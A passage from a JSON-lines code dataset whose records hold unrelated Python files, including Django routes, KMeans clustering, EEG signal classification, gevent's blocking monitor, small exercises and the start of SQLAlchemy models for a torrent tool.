name='dashboard_menus'),\n url(r'^/menus/add_menu/?$', views.add_menu, name='dashboard_add_menu'),\n url(r'^/menus/edit_menu_(?P[0-9]+)/?$', views.edit_menu, name='dashboard_edit_menu'),\n url(r'^/menus/delete_menu_(?P[0-9]+)/?$', views.delete_menu, name='dashboard_delete_menu'),\n]\n","sub_path":"apps/pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395929481","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom collections import Counter\n\n\n# In[11]:\n\n\namsterdam = pd.read_csv('datasets/amsterdam-attraction.csv')\n\namsterdam = amsterdam.dropna()\namsterdam.head()\nX=amsterdam.loc[:,['lat','lng']]\nX = X.dropna()\nX\n\n\n# In[27]:\n\n\n#run KMeans\nid_n=8\nkmeans = KMeans(n_clusters=id_n, random_state=0).fit(X)\ncluster = pd.DataFrame()\nid_label=kmeans.labels_\n\n\n# In[28]:\n\n\n#plot result\nptsymb = np.array(['b.','r.','m.','g.','c.','k.','b*','r*','m*','r^']);\nplt.figure(figsize=(12,12))\nplt.ylabel('Longitude', fontsize=12)\nplt.xlabel('Latitude', fontsize=12)\nfor i in range(id_n):\n cluster=np.where(id_label==i)[0]\n plt.plot(X.lat[cluster].values,X.lng[cluster].values,ptsymb[i])\nplt.show()\n\n\n# In[29]:\n\n\nimport math\n\ndef distance(origin, destination):\n lat1, lon1 = origin\n lat2, lon2 = destination\n radius = 6371 # km\n\n dlat = 
math.radians(lat2-lat1)\n    dlon = math.radians(lon2-lon1)\n    a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)\n    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n    d = radius * c\n\n    return d\n\n","sub_path":"vagary/recommend_attractions.py","file_name":"recommend_attractions.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"346687037","text":"# Make a function that prints the stars\ndef square(number):\n\n    # When the given number is 3, this is the most basic form \n    if number == 3:\n        star = ['***','* *','***']\n        return star\n\n    # When number is a power of 3 other than 3, use the recursive function\n    else:\n        # The list star has length number\n        star = [''] * number\n        \n        # Build the star for number from the list returned by square(number//3)\n        for i, s in enumerate(square(number//3)):\n\n            # The new star is 3 times as long as square(number//3), so the pattern repeats at i, i+(number//3) and i+(number//3)*2\n            # star[i] and star[i+(number//3)*2] are s repeated 3 times\n            # star[i+(number//3)] is s + (number//3) spaces + s\n            star[i] = s*3\n            star[i+(number//3)] = s + ' ' * (number//3) + s\n            star[i+(number//3)*2] = s*3\n\n        return star\n\n\nnumber = int(input())\n\n# square(number) is a list of length number, so print it element by element\nfor s in square(number):\n    print(s)\n","sub_path":"code/jina/재귀/별찍기-10.py","file_name":"별찍기-10.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"425212710","text":"#!/usr/bin/env python\nimport sys, OpenGL, PySide.QtOpenGL\nsys.path += ['.']\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom SceneManager import SceneManager\nfrom MainWindow import MainWindow\nfrom Entities import *\nfrom Loader import Load\nfrom Utils import *\n\n\nSM = SceneManager()\nsphere = Entity()\nsphere.m_mesh = Load('model.ply')\nsphere.m_name = 'sphere1'\nsphere.m_position = vector3(0,-1,-3.8)\n\n\ncube = Entity()\ncube.m_mesh = Load('cube.ply')\ncube.m_name = 'cube1'\ncube.m_position = vector3(0.3,3,-3.6)\ncube.m_rotate = vector4(0.4,0,1,-10)\n\n\nSM.AddEntity('sphere1', sphere)\nSM.AddEntity('cube1', cube)\n\n\n\napp = QApplication(sys.argv)\nw = MainWindow(60, SM)\n\n\n\nw.mainWindow.show()\n\n\nglMatrixMode(GL_MODELVIEW)\nglLoadIdentity()\nglTranslate(sphere.m_position.x, sphere.m_position.y, sphere.m_position.z)\ntemp = glGetDoublev(GL_MODELVIEW_MATRIX)\nsphere.m_matrix1 = transPoint(sphere.m_mesh.m_vertices, temp)\nsphere.m_matrix2 = transVector(sphere.m_mesh.m_normals, temp)\n\nglLoadIdentity()\nglTranslate(cube.m_position.x, cube.m_position.y, cube.m_position.z)\nglRotate(cube.m_rotate.t, cube.m_rotate.x, cube.m_rotate.y, cube.m_rotate.z)\ntemp = glGetDoublev(GL_MODELVIEW_MATRIX)\ncube.m_matrix1 = transPoint(cube.m_mesh.m_vertices, temp)\ncube.m_matrix2 = transVector(cube.m_mesh.m_normals, temp)\n\napp.exec_()\nsys.exit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"123272308","text":"from struct_methods import *\nimport io\nimport numpy\nfrom scipy.signal import butter, lfilter\nimport math\nimport pickle\nimport random\n\n\nclass offlineParamOpt(object):\n    def __init__(self, channel, num, groups, N=3):\n        self.Fs = 1000\n        self.filt_n = 4\n        self.N = N \n        self.channelRaw = channel\n        self.channels = [i-1 for i in self.channelRaw]\n        self.DataLength = len(self.channels)\n        self.num = num\n        
self.samples_per_packet = 43\n self.allChannels = 16\n self.groups = groups\n self.NtoLastN = [i for i in range(N)]\n self.NtoLastN.extend([i for i in range(self.DataLength-N, self.DataLength)])\n self.classOne = numpy.zeros(shape=(16, 43*self.num, self.groups))\n self.classTwo = numpy.zeros(shape=(16, 43*self.num, self.groups))\n self.frequency = [[8,30], [8,13], [13,20], [20,30]]\n self.timepoint = [1000, 4000]\n\n def readOffData(self, path):\n self.fid = open(path, \"rb\")\n # self.fid.seek(0)\n currentGroupOne = 0\n currentGroupTwo = 0\n packets = 0\n while currentGroupOne != self.groups or currentGroupTwo != self.groups:\n trigger = read_uint16le(self.fid)\n packets += 1\n if trigger == 1:\n currentGroupOne += 1\n self.fid.seek(12, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples) \n first_Packet = numpy.array(all_samples)\n firstPacketMatrics = first_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classOne[:, 0:43, currentGroupOne-1] = firstPacketMatrics.T\n for p in range(self.num-1): \n self.fid.seek(14, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples)\n next_Packet = numpy.array(all_samples)\n nextPacketMatrics = next_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classOne[:, 43*p+43:43*p+86, currentGroupOne-1] = nextPacketMatrics.T\n elif trigger == 2:\n currentGroupTwo += 1\n self.fid.seek(12, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples) \n first_Packet = numpy.array(all_samples)\n firstPacketMatrics = first_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classTwo[:, 0:43, currentGroupTwo-1] = firstPacketMatrics.T\n for p in range(self.num-1): \n self.fid.seek(14, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples)\n next_Packet = numpy.array(all_samples)\n nextPacketMatrics = next_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classTwo[:, 43*p+43:43*p+86, currentGroupTwo-1] = nextPacketMatrics.T\n else:\n self.fid.seek(1388, 1)\n self.fid.close()\n\n def offlineClass(self, path):\n self.readOffData(path)\n trainGroups = int(0.8*self.groups)\n testGroups = self.groups - trainGroups\n acc = numpy.zeros((4,100)) # need to change\n for fre in range(4):\n Wn = [self.frequency[fre][0]/(self.Fs/2), self.frequency[fre][1]/(self.Fs/2)]\n filter_b, filter_a = butter(self.filt_n, Wn, btype='band')\n Cov1 = numpy.zeros(shape=(self.DataLength, self.DataLength, self.groups)) \n Cov2 = numpy.zeros(shape=(self.DataLength, self.DataLength, self.groups))\n for i in range(self.groups):\n dataTofilter = self.classOne[self.channels, :, i]\n dataFiltered = lfilter(filter_b, filter_a, dataTofilter, axis=1)\n Dr = dataFiltered[:, self.timepoint[0]:self.timepoint[1]]\n Cov1[:, :, i] = numpy.dot(Dr, Dr.T)\n dataTofilter = self.classTwo[self.channels, :, i]\n dataFiltered = lfilter(filter_b, filter_a, dataTofilter, axis=1)\n Dr = dataFiltered[:, self.timepoint[0]:self.timepoint[1]]\n Cov2[:, :, i] = 
numpy.dot(Dr, Dr.T)\n            for cross in range(100):\n                randGroup =[i for i in range(self.groups)]\n                random.shuffle(randGroup)\n                R1 = numpy.zeros(shape=(self.DataLength, self.DataLength))\n                R2 = numpy.zeros(shape=(self.DataLength, self.DataLength))\n                for t in range(trainGroups):\n                    R1 += Cov1[:, :, randGroup[t]]\n                    R2 += Cov2[:, :, randGroup[t]]\n                R1 = R1/numpy.trace(R1)\n                R2 = R2/numpy.trace(R2)\n                R3 = R1 + R2\n                sigma, U0 = numpy.linalg.eig(R3)\n                P = numpy.dot(numpy.diag(sigma**(-0.5)), U0.T)\n                YL = numpy.dot(numpy.dot(P,R1),P.T)\n                sigmaL, UL = numpy.linalg.eig(YL)\n                Isorted = numpy.argsort(-sigmaL)\n                F = numpy.dot(P.T, UL[:, Isorted[self.NtoLastN]])\n                f = numpy.zeros(shape=(2*self.N, 1))\n                f1 = numpy.zeros(shape=(2*self.N, self.groups))\n                f2 = numpy.zeros(shape=(2*self.N, self.groups))\n                for i in range(trainGroups):\n                    for j in range(2*self.N):\n                        f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov1[:,:,randGroup[i]]),F[:,j]))\n                    f1[:, i] = f[:, 0]\n                    for j in range(2*self.N):\n                        f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov2[:,:,randGroup[i]]),F[:,j]))\n                    f2[:, i] = f[:, 0]\n                F1 = f1.T\n                F2 = f2.T\n                M1 = numpy.mean(F1, 0)\n                M1.shape = (2*self.N, 1)\n                M2 = numpy.mean(F2, 0)\n                M2.shape = (2*self.N, 1)\n                count1 = numpy.size(f1, 1)-1\n                count2 = numpy.size(f2, 1)-1 \n                w = numpy.dot(numpy.linalg.inv((count1*numpy.cov(F1.T)+count2*numpy.cov(F2.T))/(count1+count2)),(M2-M1)).reshape(1,2*self.N)\n                b = -numpy.dot(w,M1+M2)/2\n                TypeOneSign = numpy.dot(w, M1)+b\n                right = 0\n                for i in range(trainGroups, self.groups):\n                    for j in range(2*self.N): \n                        f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov1[:,:,randGroup[i]]),F[:,j]))\n                    y = numpy.dot(w, f)+b\n                    if y*TypeOneSign >= 0:\n                        right +=1 \n                    for j in range(2*self.N): \n                        f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov2[:,:,randGroup[i]]),F[:,j]))\n                    y = numpy.dot(w, f)+b\n                    if y*TypeOneSign <= 0:\n                        right +=1\n                acc[fre, cross] = right/(2*testGroups)\n        meanAcc = numpy.mean(acc, axis=1)\n        meanaccList = meanAcc.tolist()\n        frequencyIndex = meanaccList.index(max(meanaccList))\n        return meanaccList, frequencyIndex","sub_path":"offlineParamOptimization.py","file_name":"offlineParamOptimization.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"222305836","text":"def main():\n    N = int(input('Enter an integer: '))\n    limite_inferior = int(input('Enter a value for the lower bound: '))\n    limite_superior = int(input('Enter a value for the upper bound: '))\n\n    multiplo(N, limite_inferior, limite_superior)\n\ndef multiplo(numero, inferior, superior):\n    print(f'The numbers in the range {inferior} to {superior} that are multiples of {numero} are: ',end=' ')\n    while inferior <= superior:\n        if inferior % numero == 0:\n            print(inferior, end=' ')\n        inferior += 1\nmain()","sub_path":"Lista_Prof_Fabio/Algoritmos_Exercicio-03-REPETICAO-WHILE/fb_ex3_q8-while.py","file_name":"fb_ex3_q8-while.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"484203743","text":"# Copyright (c) 2018 gevent. 
See LICENSE for details.\nfrom __future__ import print_function, absolute_import, division\n\nimport os\nimport sys\nimport traceback\n\nfrom weakref import ref as wref\n\nfrom greenlet import settrace\nfrom greenlet import getcurrent\n\nfrom gevent import config as GEVENT_CONFIG\nfrom gevent.monkey import get_original\nfrom gevent.util import format_run_info\nfrom gevent.events import notify\nfrom gevent.events import EventLoopBlocked\nfrom gevent.events import MemoryUsageThresholdExceeded\nfrom gevent.events import MemoryUsageUnderThreshold\nfrom gevent.events import IPeriodicMonitorThread\nfrom gevent.events import implementer\n\nfrom gevent._compat import thread_mod_name\nfrom gevent._compat import perf_counter\nfrom gevent._util import gmctime\n\n\n__all__ = [\n 'PeriodicMonitoringThread',\n]\n\nget_thread_ident = get_original(thread_mod_name, 'get_ident')\nstart_new_thread = get_original(thread_mod_name, 'start_new_thread')\nthread_sleep = get_original('time', 'sleep')\n\n\n\nclass MonitorWarning(RuntimeWarning):\n \"\"\"The type of warnings we emit.\"\"\"\n\n\nclass GreenletTracer(object):\n\n # A counter, incremented by the greenlet trace function\n # we install on every greenlet switch. This is reset when the\n # periodic monitoring thread runs.\n greenlet_switch_counter = 0\n\n # The greenlet last switched to.\n active_greenlet = None\n\n # The trace function that was previously installed,\n # if any.\n previous_trace_function = None\n\n def __init__(self):\n prev_trace = settrace(self)\n self.previous_trace_function = prev_trace\n\n def kill(self): # pylint:disable=method-hidden\n # Must be called in the monitored thread.\n settrace(self.previous_trace_function)\n self.previous_trace_function = None\n # Become a no-op\n self.kill = lambda: None\n\n def __call__(self, event, args):\n # This function runs in the thread we are monitoring.\n self.greenlet_switch_counter += 1\n if event in ('switch', 'throw'):\n # args is (origin, target). This is the only defined\n # case\n self.active_greenlet = args[1]\n else:\n self.active_greenlet = None\n if self.previous_trace_function is not None:\n self.previous_trace_function(event, args)\n\n def did_block_hub(self, hub):\n # Check to see if we have blocked since the last call to this\n # method. Returns a true value if we blocked (not in the hub),\n # a false value if everything is fine.\n\n # This may be called in the same thread being traced or a\n # different thread; if a different thread, there is a race\n # condition with this being incremented in the thread we're\n # monitoring, but probably not often enough to lead to\n # annoying false positives.\n\n active_greenlet = self.active_greenlet\n did_switch = self.greenlet_switch_counter != 0\n self.greenlet_switch_counter = 0\n\n if did_switch or active_greenlet is None or active_greenlet is hub:\n # Either we switched, or nothing is running (we got a\n # trace event we don't know about or were requested to\n # ignore), or we spent the whole time in the hub, blocked\n # for IO. 
Nothing to report.\n return False\n return True, active_greenlet\n\n def ignore_current_greenlet_blocking(self):\n # Don't pay attention to the current greenlet.\n self.active_greenlet = None\n\n def monitor_current_greenlet_blocking(self):\n self.active_greenlet = getcurrent()\n\n def did_block_hub_report(self, hub, active_greenlet, format_kwargs):\n report = ['=' * 80,\n '\\n%s : Greenlet %s appears to be blocked' %\n (gmctime(), active_greenlet)]\n report.append(\" Reported by %s\" % (self,))\n try:\n frame = sys._current_frames()[hub.thread_ident]\n except KeyError:\n # The thread holding the hub has died. Perhaps we shouldn't\n # even report this?\n stack = [\"Unknown: No thread found for hub %r\\n\" % (hub,)]\n else:\n stack = traceback.format_stack(frame)\n report.append('Blocked Stack (for thread id %s):' % (hex(hub.thread_ident),))\n report.append(''.join(stack))\n report.append(\"Info:\")\n report.extend(format_run_info(**format_kwargs))\n\n return report\n\nclass _HubTracer(GreenletTracer):\n def __init__(self, hub, max_blocking_time):\n GreenletTracer.__init__(self)\n self.max_blocking_time = max_blocking_time\n self.hub = hub\n\n def kill(self): # pylint:disable=method-hidden\n self.hub = None\n GreenletTracer.kill(self)\n\n\nclass HubSwitchTracer(_HubTracer):\n # A greenlet tracer that records the last time we switched *into* the hub.\n\n last_entered_hub = 0\n\n def __call__(self, event, args):\n GreenletTracer.__call__(self, event, args)\n if self.active_greenlet is self.hub:\n self.last_entered_hub = perf_counter()\n\n def did_block_hub(self, hub):\n if perf_counter() - self.last_entered_hub > self.max_blocking_time:\n return True, self.active_greenlet\n\n\nclass MaxSwitchTracer(_HubTracer):\n # A greenlet tracer that records the maximum time between switches,\n # not including time spent in the hub.\n\n max_blocking = 0\n\n def __init__(self, hub, max_blocking_time):\n _HubTracer.__init__(self, hub, max_blocking_time)\n self.last_switch = perf_counter()\n\n def __call__(self, event, args):\n old_active = self.active_greenlet\n GreenletTracer.__call__(self, event, args)\n if old_active is not self.hub and old_active is not None:\n # If we're switching out of the hub, the blocking\n # time doesn't count.\n switched_at = perf_counter()\n self.max_blocking = max(self.max_blocking,\n switched_at - self.last_switch)\n\n def did_block_hub(self, hub):\n if self.max_blocking == 0:\n # We never switched. 
Check the time now\n self.max_blocking = perf_counter() - self.last_switch\n\n if self.max_blocking > self.max_blocking_time:\n return True, self.active_greenlet\n\n\nclass _MonitorEntry(object):\n\n __slots__ = ('function', 'period', 'last_run_time')\n\n def __init__(self, function, period):\n self.function = function\n self.period = period\n self.last_run_time = 0\n\n def __eq__(self, other):\n return self.function == other.function and self.period == other.period\n\n def __repr__(self):\n return repr((self.function, self.period, self.last_run_time))\n\n\n@implementer(IPeriodicMonitorThread)\nclass PeriodicMonitoringThread(object):\n # This doesn't extend threading.Thread because that gets monkey-patched.\n # We use the low-level 'start_new_thread' primitive instead.\n\n # The amount of seconds we will sleep when we think we have nothing\n # to do.\n inactive_sleep_time = 2.0\n\n # The absolute minimum we will sleep, regardless of\n # what particular monitoring functions want to say.\n min_sleep_time = 0.005\n\n # The minimum period in seconds at which we will check memory usage.\n # Getting memory usage is fairly expensive.\n min_memory_monitor_period = 2\n\n # A list of _MonitorEntry objects: [(function(hub), period, last_run_time))]\n # The first entry is always our entry for self.monitor_blocking\n _monitoring_functions = None\n\n # The calculated min sleep time for the monitoring functions list.\n _calculated_sleep_time = None\n\n # A boolean value that also happens to capture the\n # memory usage at the time we exceeded the threshold. Reset\n # to 0 when we go back below.\n _memory_exceeded = 0\n\n # The instance of GreenletTracer we're using\n _greenlet_tracer = None\n\n def __init__(self, hub):\n self._hub_wref = wref(hub, self._on_hub_gc)\n self.should_run = True\n\n # Must be installed in the thread that the hub is running in;\n # the trace function is threadlocal\n assert get_thread_ident() == hub.thread_ident\n self._greenlet_tracer = GreenletTracer()\n\n self._monitoring_functions = [_MonitorEntry(self.monitor_blocking,\n GEVENT_CONFIG.max_blocking_time)]\n self._calculated_sleep_time = GEVENT_CONFIG.max_blocking_time\n # Create the actual monitoring thread. 
This is effectively a \"daemon\"\n # thread.\n self.monitor_thread_ident = start_new_thread(self, ())\n\n # We must track the PID to know if your thread has died after a fork\n self.pid = os.getpid()\n\n def _on_fork(self):\n # Pseudo-standard method that resolver_ares and threadpool\n # also have, called by hub.reinit()\n pid = os.getpid()\n if pid != self.pid:\n self.pid = pid\n self.monitor_thread_ident = start_new_thread(self, ())\n\n @property\n def hub(self):\n return self._hub_wref()\n\n\n def monitoring_functions(self):\n # Return a list of _MonitorEntry objects\n\n # Update max_blocking_time each time.\n mbt = GEVENT_CONFIG.max_blocking_time # XXX: Events so we know when this changes.\n if mbt != self._monitoring_functions[0].period:\n self._monitoring_functions[0].period = mbt\n self._calculated_sleep_time = min(x.period for x in self._monitoring_functions)\n return self._monitoring_functions\n\n def add_monitoring_function(self, function, period):\n if not callable(function):\n raise ValueError(\"function must be callable\")\n\n if period is None:\n # Remove.\n self._monitoring_functions = [\n x for x in self._monitoring_functions\n if x.function != function\n ]\n elif period <= 0:\n raise ValueError(\"Period must be positive.\")\n else:\n # Add or update period\n entry = _MonitorEntry(function, period)\n self._monitoring_functions = [\n x if x.function != function else entry\n for x in self._monitoring_functions\n ]\n if entry not in self._monitoring_functions:\n self._monitoring_functions.append(entry)\n self._calculated_sleep_time = min(x.period for x in self._monitoring_functions)\n\n def calculate_sleep_time(self):\n min_sleep = self._calculated_sleep_time\n if min_sleep <= 0:\n # Everyone wants to be disabled. Sleep for a longer period of\n # time than usual so we don't spin unnecessarily. We might be\n # enabled again in the future.\n return self.inactive_sleep_time\n return max((min_sleep, self.min_sleep_time))\n\n def kill(self):\n if not self.should_run:\n # Prevent overwriting trace functions.\n return\n # Stop this monitoring thread from running.\n self.should_run = False\n # Uninstall our tracing hook\n self._greenlet_tracer.kill()\n\n def _on_hub_gc(self, _):\n self.kill()\n\n def __call__(self):\n # The function that runs in the monitoring thread.\n # We cannot use threading.current_thread because it would\n # create an immortal DummyThread object.\n getcurrent().gevent_monitoring_thread = wref(self)\n\n try:\n while self.should_run:\n functions = self.monitoring_functions()\n assert functions\n sleep_time = self.calculate_sleep_time()\n\n thread_sleep(sleep_time)\n\n # Make sure the hub is still around, and still active,\n # and keep it around while we are here.\n hub = self.hub\n if not hub:\n self.kill()\n\n if self.should_run:\n this_run = perf_counter()\n for entry in functions:\n f = entry.function\n period = entry.period\n last_run = entry.last_run_time\n if period and last_run + period <= this_run:\n entry.last_run_time = this_run\n f(hub)\n del hub # break our reference to hub while we sleep\n\n except SystemExit:\n pass\n except: # pylint:disable=bare-except\n # We're a daemon thread, so swallow any exceptions that get here\n # during interpreter shutdown.\n if not sys or not sys.stderr: # pragma: no cover\n # Interpreter is shutting down\n pass\n else:\n hub = self.hub\n if hub is not None:\n # XXX: This tends to do bad things like end the process, because we\n # try to switch *threads*, which can't happen. 
Need something better.\n                    hub.handle_error(self, *sys.exc_info())\n\n    def monitor_blocking(self, hub):\n        # Called periodically to see if the trace function has\n        # fired to switch greenlets. If not, we will print\n        # the greenlet tree.\n\n        # For tests, we return a true value when we think we found something\n        # blocking\n\n        did_block = self._greenlet_tracer.did_block_hub(hub)\n        if not did_block:\n            return\n\n        active_greenlet = did_block[1]\n        report = self._greenlet_tracer.did_block_hub_report(\n            hub, active_greenlet,\n            dict(greenlet_stacks=False, current_thread_ident=self.monitor_thread_ident))\n\n        stream = hub.exception_stream\n        for line in report:\n            # Printing line by line may interleave with other things,\n            # but it should also prevent a \"reentrant call to print\"\n            # when the report is large.\n            print(line, file=stream)\n\n        notify(EventLoopBlocked(active_greenlet, GEVENT_CONFIG.max_blocking_time, report))\n        return (active_greenlet, report)\n\n    def ignore_current_greenlet_blocking(self):\n        self._greenlet_tracer.ignore_current_greenlet_blocking()\n\n    def monitor_current_greenlet_blocking(self):\n        self._greenlet_tracer.monitor_current_greenlet_blocking()\n\n    def _get_process(self): # pylint:disable=method-hidden\n        try:\n            # The standard library 'resource' module doesn't provide\n            # a standard way to get the RSS measure, only the maximum.\n            # You might be tempted to try to compute something by adding\n            # together text and data sizes, but on many systems those come back\n            # zero. So our only option is psutil.\n            from psutil import Process, AccessDenied\n            # Make sure it works (why would we be denied access to our own process?)\n            try:\n                proc = Process()\n                proc.memory_full_info()\n            except AccessDenied: # pragma: no cover\n                proc = None\n        except ImportError:\n            proc = None\n\n        self._get_process = lambda: proc\n        return proc\n\n    def can_monitor_memory_usage(self):\n        return self._get_process() is not None\n\n    def install_monitor_memory_usage(self):\n        # Start monitoring memory usage, if possible.\n        # If not possible, emit a warning.\n        if not self.can_monitor_memory_usage():\n            import warnings\n            warnings.warn(\"Unable to monitor memory usage. Install psutil.\",\n                          MonitorWarning)\n            return\n\n        self.add_monitoring_function(self.monitor_memory_usage,\n                                     max(GEVENT_CONFIG.memory_monitor_period,\n                                         self.min_memory_monitor_period))\n\n    def monitor_memory_usage(self, _hub):\n        max_allowed = GEVENT_CONFIG.max_memory_usage\n        if not max_allowed:\n            # They disabled it.\n            return -1 # value for tests\n\n        rusage = self._get_process().memory_full_info()\n        # uss is only documented as available on Windows, Linux, and OS X.\n        # If not available, fall back to rss as an approximation.\n        mem_usage = getattr(rusage, 'uss', 0) or rusage.rss\n\n        event = None # Return value for tests\n\n        if mem_usage > max_allowed:\n            if mem_usage > self._memory_exceeded:\n                # We're still growing\n                event = MemoryUsageThresholdExceeded(\n                    mem_usage, max_allowed, rusage)\n                notify(event)\n                self._memory_exceeded = mem_usage\n        else:\n            # we're below. 
Were we above it last time?\n if self._memory_exceeded:\n event = MemoryUsageUnderThreshold(\n mem_usage, max_allowed, rusage, self._memory_exceeded)\n notify(event)\n self._memory_exceeded = 0\n\n return event\n\n def __repr__(self):\n return '<%s at %s in thread %s greenlet %r for %r>' % (\n self.__class__.__name__,\n hex(id(self)),\n hex(self.monitor_thread_ident),\n getcurrent(),\n self._hub_wref())\n","sub_path":"src/gevent/_monitor.py","file_name":"_monitor.py","file_ext":"py","file_size_in_byte":17195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620387523","text":"import bs4, requests\r\n\r\nres = requests.get(\"http://automatetheboringstuff.com/\")\r\nres.raise_for_status()\r\n\r\nsoup = bs4.BeautifulSoup(res.text, \"html.parser\")\r\n# right click element > inspect\r\n# right click highlighted code > copy > copy selector\r\nelems = soup.select(\"body > div.main > div:nth-child(1) > h2:nth-child(19)\")\r\nprint(elems[0].text)\r\n","sub_path":"0_reference/AutomateTheBoringStuff/example_web_html.py","file_name":"example_web_html.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192426306","text":"# 1812 / calculate how many tiles will be needed\nfor T in range(int(input())):\n N, M = map(int, input().split()) # number of needed tiles, len of basic tile\n S = sorted(list(map(int, input().split())), reverse=True) # power number list\n\n # set basic number of needed tiles and remain tiles list\n cnt = 1\n areas = [(M, M)]\n for s in S:\n ln = 2 ** s # calculate len of cutting tile\n for i in range(len(areas)):\n w, h = areas[i] # compare width and height of cutted tile\n # if len of original tile is bigger, cut it\n if w >= ln and h >= ln:\n areas.append((w - ln, h - ln))\n areas.append((w - ln, ln))\n areas.append((ln, h - ln))\n areas = areas[:i] + areas[i + 1:]\n break\n # else plus 1 to counter and add cutted tile\n elif i == len(areas) - 1:\n cnt += 1\n areas.append((M - ln, M - ln))\n areas.append((M - ln, ln))\n areas.append((ln, M - ln))\n\n print(f'#{T + 1} {cnt}')\n ","sub_path":"D5/1812.py","file_name":"1812.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125918260","text":"# -*- coding: utf-8 -*-\n\n# Copyright (C) 2017 Luis López \n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,\n# USA.\n\n\nimport re\nimport sys\nfrom urllib import parse\n\n\nfrom appkit import utils\nfrom appkit.db import sqlalchemyutils as sautils\nfrom sqlalchemy import (\n    Column,\n    Integer,\n    String,\n    ForeignKey,\n    and_,\n    # event,\n    func,\n    orm,\n    schema\n)\nfrom sqlalchemy.ext.hybrid import hybrid_property\n\n\nfrom arroyo import bittorrentlib\n\n\nsautils.Base.metadata.naming_convention = {\n    \"ix\": 'ix_%(column_0_label)s',\n    \"uq\": \"uq_%(table_name)s_%(column_0_name)s\",\n    \"ck\": \"ck_%(table_name)s_%(constraint_name)s\",\n    \"fk\": \"fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s\",\n    \"pk\": \"pk_%(table_name)s\"\n}\n\n\nclass Variable(sautils.KeyValueItem, sautils.Base):\n    __tablename__ = 'variable'\n    __table_args__ = schema.UniqueConstraint('key'),\n\n\nclass Source(sautils.Base):\n    __tablename__ = 'source'\n\n    # Required\n    id = Column(Integer, autoincrement=True, primary_key=True)\n    name = Column(String, nullable=False)\n    uri = Column(String, nullable=False, unique=True)\n    provider = Column(String, nullable=False)\n\n    # EntitySupport\n    episode_id = Column(Integer,\n                        ForeignKey('episode.id', ondelete=\"SET NULL\"),\n                        nullable=True)\n    episode = orm.relationship('Episode',\n                               uselist=False,\n                               backref=orm.backref(\"sources\",\n                                                   cascade_backrefs=False,\n                                                   lazy='select'))\n\n    movie_id = Column(Integer,\n                      ForeignKey('movie.id', ondelete=\"SET NULL\"),\n                      nullable=True)\n    movie = orm.relationship('Movie',\n                             uselist=False,\n                             backref=orm.backref(\"sources\",\n                                                 cascade_backrefs=False,\n                                                 lazy='select'))\n\n    def __init__(self, name, uri, provider,\n                 timestamp=None,\n                 size=None,\n                 seeds=None,\n                 leechers=None,\n                 type=None,\n                 language=None,\n                 meta=None,\n                 tags=None):\n\n        # Non database attributes\n        self.meta = meta or []\n        self.language = language\n        self.leechers = leechers\n        self.seeds = seeds\n        self.size = size\n        self.timestamp = timestamp or utils.now_timestamp()\n        self.tags = tags or []\n        self.type = type\n\n        super().__init__(name=name, uri=uri, provider=provider)\n\n    def __eq__(self, other):\n        return _eq_from_attrs(self, other, ('uri',))\n\n    def 